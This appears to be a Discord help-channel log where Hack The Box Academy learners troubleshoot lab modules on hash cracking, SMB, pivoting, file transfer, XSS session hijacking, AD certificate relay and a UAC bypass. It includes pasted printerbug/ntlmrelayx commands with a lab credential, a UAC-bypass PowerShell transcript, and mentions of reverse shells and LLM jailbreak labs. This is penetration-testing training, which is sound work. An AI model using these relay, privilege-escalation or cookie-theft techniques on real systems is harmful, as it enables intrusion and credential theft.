yeah rockyou and -a 0, this one specifically says to apply some of the rulesets hashcat has by default, but I have too little info I think, given that there are a lot of possibly hash formats still and a lot of different rulesets (some of which lead to hours of running)

Well let's narrow that down, where was the hash retrieved from usually helps narrow it down

It doesn't say, the exercise is this:
Crack the following hash: 7106812752615cdfe427e01b98cd4083

And the hint says the following:
Use hashid to identify the hash, and then use one of the Hashcat built-in rule sets or hybrid mode to help you crack it.

yeah I haven't really done that module so you're gonna have to wait for someone who has...

alright makes sense, thanks for the effort! I think I'll move on to sth else in the meantime

in NTFS vs. Share Permissions the smbclient command won't work in my vm terminal

does this exercise need to be done on pwnbox?

Which module and please share errors always using screenshots

windows fundamentals

do_connect: Connection to 10.129.81.189 failed (Error NT_STATUS_IO_TIMEOUT)

will do, but it's just a small error

just says it can't connect

do_connect: Connection to SERVER_IP failed (Error NT_STATUS_NOT_FOUND)

what command are you executing specifically

smbclient -L SERVER_IP -U htb-student

i switched server_ip for the ip of the target in case that was an issue

and still the same error

The syntax is not correct, use forward or backslashes with the IP

ill try

tried

i tried both, where would you put them

show me how you are putting them

smbclient -L \SERVER_IP -U htb-student

thats double

but it doesnt show both

i tried / as well

same error everytime

just seems the smbclient doesnt go with my kali vm

i completed the category as none of the questions needed the commands, however I'd still like to know the issue. Oh well.

That's because the smb port is closed for this section of questions

only rdp port is open

Hello all, O 'm facing an issue in Brken Authentication > Brute forcing password reset tokens, I've obtained the valid OTP via ffuf, but when i inoput it says The provided token is invaild, i've trie multiple times but fail.

Got the flag, i was doing it write i just needed to put the token in the URL

@reef axle I can help you with that dm me

I got it thanks btw

Credential Hunting in Network Shares, can give me some advice? I used SnaffCon, but I can't find it.
https://academy.hackthebox.com/module/147/section/1334

try using powerhunt

if still not work then go to netexec...most likely you will get error from netexec

then do some manually hunting in smb, you will find what you are looking for

How you solved it, I have exactly the same problem

Uhm does anyone know some serious level of hacking here

Do yall know the answer to this or how to get this

Determine what user the ProFTPd server is running under. Submit the username as the answer. ( ProFTPd isn't even installed on the system 😭 )

it's in linux fundamentals

I got a day off, I realized I was posting in off-topic

No hackers here

Hello I need a friend serious one that can walk me in web hacking

Hi, I been stuck on Attacking Authentication Mechanisms Skills Assessment, I think Im on a correct path, I been trying all day but nothing worked, could anyone help me on that

Hi everyone, I am new to the channel, I am facing a problem with one Section of the Prompt Injection Attacks module, specifically the Jailbreaks I section.
Is it the right place to share the problem and ask for suggestions?

I haven't done that module, but if you don't get any takers another option is to use the search feature to see if anyone has received a nudge, hint, or some type of information that might help you too move forward.

alright thanks.

I'm currently doing the Linux File Transfers module, and for some reason when I attempt to SSH into the htb-student user, it loads for a while, and then it gives me this error message "Connection closed by <ip> port 22". I am on a virtual box machine running kali, and I have connected to the VPN. When I retry loading the VPN as well as restarting and getting a new target IP, I still get the same error. Any suggestions?

Hi, I can't understand why secretsdump is giving me this problem.

ok thanks

Hello everyone, I am new and start learning the network basics and I stuck on the subneting and subnet masks. Can't understand how to answer the questions in the section of the module. Can you recommend me something to read to understand it more or a good video. Thank you

I did as you said but it gives me another error that I can't understand what it refers to

anyone?

.

Thank you.

hey can anyone please help me out i think i have done everything correct till now btu at end i get this (This is from Citrix breakout section from Windows Priv Esc)

Anyone?

Hi, I been stuck on Attacking Authentication Mechanisms Skills Assessment, I think Im on a correct path, I been trying all day but nothing worked, could anyone help me on that

even with chatgpt ?

unfortunetly

sorry i am new here i m so excited to learn but i am not at this level

nice to meet you

i am french

its alright, Good Luck!

where do you come from man ?

Can anyone help me

in this

Hi, welcome. Make sure to read the #rules and follow instructions in #welcome to gain access to most of the server like #general where you can introduce yourself, etc.

ok nice thank you

You can watch network chuck's ccna playlist

Can you pls share screenshot if possible

I cannot share it...discord wont allow it...Ill copy everything

You are doing password attacks module right

Discord allows

pivot skill assessment

Ohh yeah

Sorry my bad

@silver ocean Please do not post content from modules above tier 0, especially skill assesssments.

Go to #welcome

ohhhh...ill be carefull..then how do I ask for assistance?

You need to do some verification steps

Its like giving hints

Or you can dm me

thank you ill dm you @opal shuttle

Sure

State the module, section, question you're on, state what you've done without revealing content from the module. Anyone who has done the module knows the steps and what to do so they don't need additional context. If you get errors maybe post the error and ask why you may get it, etc. If you feel like you need to reveal a little more info you can ask someone to take it to DM's.

Who finished the module Password Attacks - I got stuck in the Pass the Certificate section. I resolved the first question, but I got stuck on the second one. What tool did you use? I appreciate any hints

the dc01 ccache is helpful

OK, Roger That

for ports DC01 filtred ?

It depends

nmap show and SMBD-Thread-9 (process_request_thread): Received connection from server , attacking target http://server

It helps to know what module you're working on

ok work module Pass the Certificate flag Administrator

So same as the person above

I did exactly what was written in the section, replacing the relevant ips for the crtsrv and dc

ok thanks

I really think she's into me.

What module is this related to? 🤨

isnt this the web challenge

#challenges is more appropriate

Sorry, I'll take it over there.

Do you got root?

do cd /

then cd home

then check if administrator is a user

if so then cat the flag.txt file in it's home directory

try that tell me if it works

Hi Team, i was wondering if someone could be of assitance in reviewing my JavaScript code for XSS- Session Hijacking Model in CPTS, my javacode excutes the XSS vulnerability and i get a hit on my PHP server on my attack machine but i cant get the cookie to show?

Looks like your XSS payload is working, but it's directing the user to /profilepic/script.js on your server instead of posting the cookie.

@fathom pendant Thanks for the hint

Password Attacks - Done!

thank you got the cookie 🙂

Im in this module not easy

I agree with you on that!

Hello everyone,
I’m looking for someone who has completed the LLM Output Attacks module of the AI Red Teamer path. I need help with the skill assessment because I can’t get the flag.

Hello i am doing Penetrations tester but my cubes end so i decided to take module topics put in ai new will teach me because I am student I don't have money to buy cubes what everyone think

There's a very cheap student subscription option that unlocks modules up to tier 2. I'd look into that instead. AI can be wrong. It also can't teach you like HTB does.

Im a beginner can someone help me get started

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Credential Hunting in Network Shares, can give me some advice? I used SnaffCon, but I can't find it.
https://academy.hackthebox.com/module/147/section/1334

https://academy.hackthebox.com/module/85/section/877 the question asks for the value of rax at _start+16 but it segfaults at +13 the solution to the question is at +0a before rax is set to 0x0 and before we try to add al to rax the first and second time

Guys can help me on Module 307: LLM Output Attacks, Section 3590? Specifically question 2 Im strunggling. Tried to do .html markdown and host it and use a python webserver to host the file for uploading but failing 😐 to get the history chat

Best to just say the actual module and section names or link it, no one's going to look that up

Guys can help me on Module 307: LLM Output Attacks, Section 3590? Specifically question 2 Im strunggling. Tried to do .html markdown and host it and use a python webserver to host the file for uploading but failing 😐 to get the history chat

https://academy.hackthebox.com/module/307/section/3590

okay sir

Is one of y’all hackers

nvm guys solved

Okay

Please read the #rules and follow the instructions in #welcome. This channel is for discussion of the modules on Academy.

Hi, can anyone help me im stuck on a module since i get "Which version of vsftpd is installed on the target system? (Format: x.y.z)" but its not installed or i might be dumb☃️

try using dpkg --list

thanks it worked🤓

some important info that can help you understand more:

🥰

for installed files, that are fully installed you'll see the status ii in front with dpkg

first i, should be/marked for install
second i, is installed

https://askubuntu.com/questions/18804/what-do-the-various-dpkg-flags-like-ii-rc-mean

https://man7.org/linux/man-pages/man1/dpkg-query.1.html

thanks ima keep that comand in my notes

You have to use power hunt or netexec, you will errors in netexec so manually login to smb and explore

hey i am trying to connect kali linux to the linux essential modules so i can use my own linux instead of the pwnbox, but i am struggling, anyone insterested in helping feel free to dm me

tips for getting help:
It helps to describe the error, not just "i'm struggling"

• What errors/issues are you running into?
• Did you connect to the vpn?
• Are you running the vpn (on your kali) and the pwnbox at the same time (don't do that, it causes networking issues -- collisions aren't fun)

ye my bad, i am really entry level and i have tried to connect to the vpn but do not know if it worked, when i try the ssh command it just blanks out and get stuck

ok so:
In your vpn connection terminal (where you did sudo openvpn academy-regular.ovpn) do you see Initialization Sequence Completed?

it says options error: In [CMB-LINE]:1: Error opening config file: academy-regular.ovpn

Well, there's your error! it sounds like the academy-regular.ovpn file isn't in the directory you're trying to run the command from

if you signed in to HTB and downloaded it from the website within your vm; it'll typically be saved in the Downloads directory;
normally when you open a terminal it opens up to your "home" directory (shorthand ~), so you can just run sudo openvpn Downloads/academy-regular.ovpn

if you're in a vm, most vms allow for drag/drop from host -> guest

i tried the command and the same error came up

i tried dragging the file into linux aswell

if you dragged it into your vm it likely ended up on the desktop

cd ~/Desktop; ls does it show up? or did you receive errors when trying to drag & drop

ohh i am a complete noob... i just dragged the file from my file browser into the terminal

LOL it happens

https://tenor.com/view/jake-adventure-time-sucking-sort-of-good-gif-22475109

This Adventure Time quote helps me cope with my massive skill issues

is a vm where you use the remote desktop connection?

i am saving that LOL

yes, the virtual machine is where you'll do all the hacking/connecting from, you don't run the vpn from your host

okay where do i find the vpn i need to use in the remote desktop conn

https://academy.hackthebox.com/vpn

you only generally need to download that file once, and you're set for a bit. Occasionally you'll need to download a new one (also known as regenerating) by changing vpn regions

i'm actually working on a python tool to make the process a bit easier, been working off/on that project for a bit. It's gone through a couple iterations

ahh okay but do i need to download virtualbox,VMWare or any of that or can i use the remote desktop connection? and what do you recommend

uuu nice

well you said you had a Kali linux machine, no?

is that a baremetal (no vm)?

oh no i have normal windows machine with WSL

AH wsl, i'm not experienced enough in wsl to kinda go through that stuff. Virtualbox and VMWare are the most popular and Kali has documentation on installing in a vm (there's also just premade vm images for quick plug and play)

ahh okay i will download virtualbox then

I am studying the Prompt Injection Attacks Module and facing problems with the Jailbreaks I section.
I am asked to solve a lab which in the section content is shown to be accessible at http://127.0.0.1:5000/prompt_inject/jailbreak_1.
The instructions (screenshot attached) tell me to ssh into the target (I did spawn it at every attempt).
I tryied to ssh into it both from the native HTB Pwnbox and my loval HTB VM connected with openvpn. I all the cases I can successfully login but the connection closes immediately (second screenshot). I also tried to use the target as http and https address, but nothing worked.
Has anyone faced a similar situation?
Thanks!

Hi, that is intended behavior as the SSH server does not allow command execution. Please use the -N flag as shown in the Direct Prompt Injection section.

I added a note to all relevant sections 🙂

w vautia

Anyone having issues with labs rn? Doing the DACL Attacks 1 skills assessment and ws01 machine doesn't seem to show up anymore, have reset 4 times and waited 5-10. Showed up initially for the first time solving the lab

Module... password attack / attacking Sam , system , security

I have all the hashes now I want to send it to my machine but .. I can't

It's giving error after error ..

Morning all, Beginner here! , trying to run through the "getting started" module and ive set up a Windows 11 VM installed WSL2 but im unable to run Kali as its asking to enable Virtualization in the bios, ive checked online and ran through some things but can seem to get it to run , is there something obvious that im missing? , ive checked my local machines bios and AMD-V is enabled same for the VM config, Hyper V is enabled on the VM ( i installed the developer VM from the module )

@fathom pendant hey can U help ?

So real

xfreerdp has the /drive: option /drive:/path/to/file/to/share,name_of_share

also: @rain mirage don't ping people randomly

But is there no way to send a post request (hash.txt) to my target listener ?

That's brilliant, it worked, thank you so much!!!!

well you'd need a python upload.server running, iirc the http.server is only GET requests

if you need more references for transferring files, there's the File Transfers module.

Ya that just accepts get

if you're using evil-winrm, there's the built in upload/download functionality

@fathom pendant i have now downloaded virtualbox and installed kali linux and made my VM, i also enabled host->guest drag and drop, what should i know do to connect the vpn?

drop the file into the vm, open terminal, cd ~/Desktop && sudo openvpn academy-regular.ovpn

@tough zodiac No. Not what this server is about.

i tried opening hackthebox on firefox inside the VM to install the file but it wont let me open the site

?

it could just be taking a minute to load. if you don't have a lot of resources to allocate to a full vm, then it can take a lot longer to load pages

Hello everybody, I’m just wondering if you all have any suggestions for places to look for internships that are in the field of Cybersecurity? Thanks!

This is better suited for #careers-and-certs since this channel is for the modules on HTB. You'll need to follow the instructions in #welcome to gain access.

Ok. Thanks!

i only had ipv6 not ipv4 so i had to force it and now it worked

Hey

Hi, I would like to talk about the "Skill Assessment Part2" of Active Directory. Anyone? : )

exactly about this question

spray and pray :)

Yes, I have Solved it, but I don't understand why that password? :/

I'm newbie! Anyone can guide?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

anyone help me with password module if they done it thanks

Yes

Regarding which part

Hii

If u berson can close it,?

Unless it's your account that's illegal, please read #rules

I have a problem with the Attacking Thick Client Applications topic from the Attacking Common Applications module. Does anybody know how to get the username:password. I literally can not find it. Spent too much time on this topic.

Look up: ippsec - Fatty on youtube

Hi everyone
I am working on editor machine
I have a rev shell but I am stuck om escalate the privileges any one can help or get me a hint?

can you guys give me obisian htb theme agian pls

Module name: password attacks, pass the hash lab. Could someone please explain why, even though the base64 encoded reverse shell payload is executed on the target machine, it still fails to connect back to the listener? What mistake might i be making?

wrong channel

go to #1401229864647921734

i thought you are saying that ippsec is fat

Yooo guys

for normal chatting , checkout #general

Hi can someone explain where I'm going wrong? I'm in the stack based buffer overflow module the question asks "Examine the registers and submit the address of ebp as the answer". So I do a buffer overflow to get the offset of 1032 and add it to the esp to get the address of the ebp but I keep getting the wrong answer

These modules section's are kinda out of order, only at the end of the Intro to Networking Module does it introduce IP packets but before that comes VLANs, Ethernet frames and all the other stuff that are built on and use IP Packets in certain ways.

Does anyone have a tip on uploading files from Windows to Linux using python upload server? Apparently the POST method to/upload of the server doesn't work because there is an upload form. Any suggestions?

If you are on windows evil winrm provide option to download and upload

If you are on linux you can you base64 and decode it on your host or wherever you want

For real? I didn't know that

Yup

Doesn't work with lsass.dmp for example, unfortunately...

You logged in via evil winrm?

No, I used pass the ticket in mimikatz and opened the PowerShell session on a domain controller as a different user

You can host your smb server

Then open cmd, use move command

Its shown in Attacking Sam section i guess

I've tried that. The problem is that I have pivot. And pivot doesn't allow to redirect to port 445, because you cannot specify the port with the move \ip\share command

I guess running pivot as sudo is a solution? So that it allows ports under 1024

You have rdp right?

I think there is no option to specify a custom port for smb share operations in poweshell

Have you tried ligolo for pivoting?

Yes, I do indeed have RDP. But 🙂 That would be too easy. I want to practice file upload from Windows using a scenario where I get a shell only, no evil-winrm or rdp

Yes, ligolo doesn't allow ports under 1024 for redirection

Should I start ligolo as sudo?

Or it could be, they would have given you ssh access...but there is no other option thats y they are giving you rdp option

I dont think that would matter

Check for evilwinrm

Is winrm port openm

?

It was a skills assessment for password attacking module. Yes, I transferred the file, but because I had GUI and it was easier

Ohh so you are on the final one

Yes, I solved it, but I can't sleep until I understand how to transfer the files using PowerShell only

Btw i havent looked at it, but ligolo offers a way to download and upload files

Really?

Yeah

I'll write that down...

There is upload function in powershell

It has to be the Invoke-WebRequest class?

Dont remember exactly

There is Invoke-Upload but it doesn't work with older pws versions

You can also try base64 method

Last option

Yeah, but unfortunately, as I said, for .dmp files that doesn't work 😦

Can you ping your host?

From that machine can you ping yout kali?

I am not doing it right now 🙂 I am just asking how I could have done that if I only had powershell access, no RDP or evil-winrm. In a scenario where you perform pass the ticket from a different machine and get a PowerShell from that other windows domain-joined machine

Getting a PowerShell on domain controller. Without pivot that would be smb, easy. But there's pivot so it complicates port usage

Yeah

But they will give something

Like winrm or ssh, from where you can do this

I mean, yeah, true, maybe I am asking for too much under various conditions. My goal is to understand what I can do under many restrictions

But I'll definitely add the evil-winrm file transfer to my pentest book

any idea why rdp is stuck on black screen? tried resetting both the target and pwnbox inside Internal Password Spraying - from Windows AD
(its been more than 10 minutes since target is up)

i think its target error because that happens when creds are wrong

either im doing something wrong or im losing my mind lol

can anyone please help me why do I keep getting this error in Windows priv esc citrix breakout in uac bypass part

i also get script failed due to call depth overflow

anyone pls help

its just stuck at rtlleavecriticalsection-> &peb -> Fastpeblock and after this i get bunch of error

maybe tls?

its not connection issue as i already connected in the 3 pic i think its creds issue

Not sure, but you can DM and I'll take a look at some things.

okay

try with .\ maybe?
just a wild guess..

since i guess it is a local user you're conencting to no?

no one is asking me to dm them 😔

Hey guys, earlier in the course I think there was a reference to a website were one could search for vulnerabilities connected to software versions, I don't remember what its called. Anybody know?

Did you decode the cookie?

Did you hit enter inside the black screen? This is sometimes necessary.

Hi there has anyone completed the Android Application Dynamic Analysis recently? Im at the Hooking Native Methods, trying to do the demonstration, but the issue is that they are using an outdated version of frida, which I tried to simulate but even that is not working. The script used in the demo is just not woring. I get "TypeError: not a function". I've tried to rewrite it, but no success. If anyone know how to help? Thank you !

I am doing the enumeration module, specifically the Linux Remote Management Protocols, and I had a question about practical application for the r-commands enumeration process. Am I understanding this correctly in assuming that unless we have explicit access to the servers hosts.equiv or .rhosts through some sort of LFI or something of the like, That you are just trying to randomly connect using username/IP spoof combos or something?

Need help with Windows Privilege Escalation DnsAdmins. I really dont have understand what this is trying to accomplish.

Nevermind, had to log out and log back in

hello i have a problem with pass the certificate section in password attack module
when i use the printerbug.py it give me this

┌─[us-academy-1]─[10.10.14.232]─[htb-ac-1402630@htb-c8imtf43bh]─[~/krbrelayx]
└──╼ [★]$ python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:'package5shores_topher1'@10.129.234.174 10.10.14.232
[*] Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.129.234.174
[*] Bind OK
[*] Got handle
The NETBIOS connection with the remote host timed out.
[*] Triggered RPC backconnect, this may or may not have worked
[-] An unhandled exception has occured. Trying next host:
[-] Error occurs while reading from remote(104)

then when i enable the debug on the ntlm

 sudo impacket-ntlmrelayx   -t http://10.129.234.110/certsrv/certfnsh.asp   --adcs --template 'DomainControllerAuthentication(Kerberos)' -smb2support    -debug

it gave me this

*] SMBD-Thread-9 (process_request_thread): Received connection from 10.129.234.174, attacking target http://10.129.234.110
[+] Exception:
Traceback (most recent call last):
<SNIP>
OSError: [Errno 113] No route to host

what i am doing wrong?

hi

what modules should i get to start with sherlocks/machines

can some one help with Attacking Web Applications with Ffuf module ?

One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

i have tried many lists on all 3 sub-domains with no luck

try impacket v12

i need help with attacking common applications osticket section, wen i visit the vhost at support.inlanefreight.local
(i added it to /etc/hosts ) i get an empty page with Apache/2.4.41 (Ubuntu) Server at support.inlanefreight.local Port 80

Hey guys 👋, I have a question about a task in the course "Windows Event Logs & Finding Evil".
I need to determine which process injected into the process that executed unmanaged PowerShell code. The answer should be the process name.

To find it, I’m using this command:

    Where-Object { $_.Message -match "ImageLoaded.*(clr\.dll|mscoree\.dll)" } |
    Format-List TimeCreated, ProviderName, Id, Message````

The course says to identify malicious .NET assemblies by targeting clr.dll and mscoree.dll.

Any tips on making sure I’m on the right track?

wasnt there a modul where we set up a Go Rest api? 🤔

still didn't work

ummm...you can try by increasing timeout

i odnt understnad

so you cant actually use smbclient, even though the section tells you to run it?

Try the ad cert mentioned in the reading

can you please check dm

Im not at home, also my dms aren't open for random help

In windows priv esc module of citrix breakout at end i get this erorr

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>powershell -ep bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> cd C:\USERS\Public
PS C:\USERS\Public> ls


    Directory: C:\USERS\Public


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d-r--         7/14/2009   5:08 AM            Documents
d-r--         7/14/2009   4:54 AM            Downloads
d-r--         7/14/2009   4:54 AM            Music
d-r--         7/14/2009   4:54 AM            Pictures
d-r--         4/12/2011   8:28 AM            Recorded TV
d-r--         7/14/2009   4:54 AM            Videos
-a---          8/9/2025   2:51 PM      84149 Bypass-UAC.ps1
-a---          8/9/2025   3:32 PM       6144 CMSTP-UAC-Bypass.dll
-a---          8/9/2025   3:32 PM      11776 CMSTP-UAC-Bypass.pdb
-a---          8/9/2025   2:51 PM     494860 PowerUp.ps1
-a---          8/9/2025   2:51 PM       3623 Source.cs
-a---          8/9/2025   3:10 PM     208896 UserAdd.msi


PS C:\USERS\Public> IMPORT-MODULE .\Bypass-UAC.ps1
PS C:\USERS\Public> Bypass-UAC -Method UacMethodSysprep

[!] Impersonating explorer.exe!
[+] PebBaseAddress: 0x7EFDE000
[!] RtlEnterCriticalSection --> &Peb->FastPebLock
[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x00161328
[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x00161330
[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list
[>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x0016263C
[>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x00162644
[!] RtlLeaveCriticalSection --> &Peb->FastPebLock

It gets stuck in this and after long time bunch of errors come.

Again. Im not at home so I dont have my notes in front of me

I just had a moment to look at my phone

okayy

havent been here for a while, gz Marcie for Mod 😄

Retrying 🙂
Hi there has anyone completed the Android Application Dynamic Analysis recently? Im at the Hooking Native Methods, trying to do the demonstration, but the issue is that they are using an outdated version of frida, which I tried to simulate but even that is not working. The script used in the demo is just not woring. I get "TypeError: not a function". I've tried to rewrite it, but no success. If anyone know how to help? Thank you !

hi, I am solving AEN lab, I was on one of the internal host and I got creds of ilf******* user and this user is part of users that can do rdp but rdp is not working for this? Has someone faced similar issue? I even changed the us server 4 to us server 2 didn't solved still

I have a quick question on SQL Injection Fundamentals > Union Clause > Un-even Columns. I was able to get the correct answer but I'm a little confused.
When I used describe <table name> it looked like the both tables had the same number of columns. So I wasn't sure why I needed to start incrementing my UNION with junk data. Hopefully this makes sense.

Pivoting is key

Where does it tell you specifically to run smbclient for the given questions? It just tells you to authenticate using RDP.

module attacking lsass , password attacks
CMD=hashcat -m 1000 hash.txt ../wordlist/passwords/rockyou.txt

i cant crack it open i tryed othere wordlist besides it as well , any hint ?

Try using john the ripper

Thx , but I'm done

Np

Usually rockyou.txt is more than enough

Ya , at the end I used a bigger version for that only

I was saying joh the ripper because it automatically detects the hash, in case if you were using wrong number

Just give him hash and wordlist

Can you tell name?

Well the same is still rockyou.txt , before I was using a diff rockyou.thx (which was around 200 words) I found a new one which is named rockyou.txt (it's much bigger )

Ohh

👀

the size of the new one : 139921497 Aug 10 10:22 rockyou.txt

I guess i havent updated my rockyou

But i was able to crack with default one

same as me ..

oh

Yeah

I have already pivoted I have access to internal network

can some one help with Attacking Web Applications with Ffuf module ?
One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

i have tried many lists on all 3 sub-domains with no luck

Guys

I stating hacking

Pliz tell do I need to learn coding language

Or later

Staff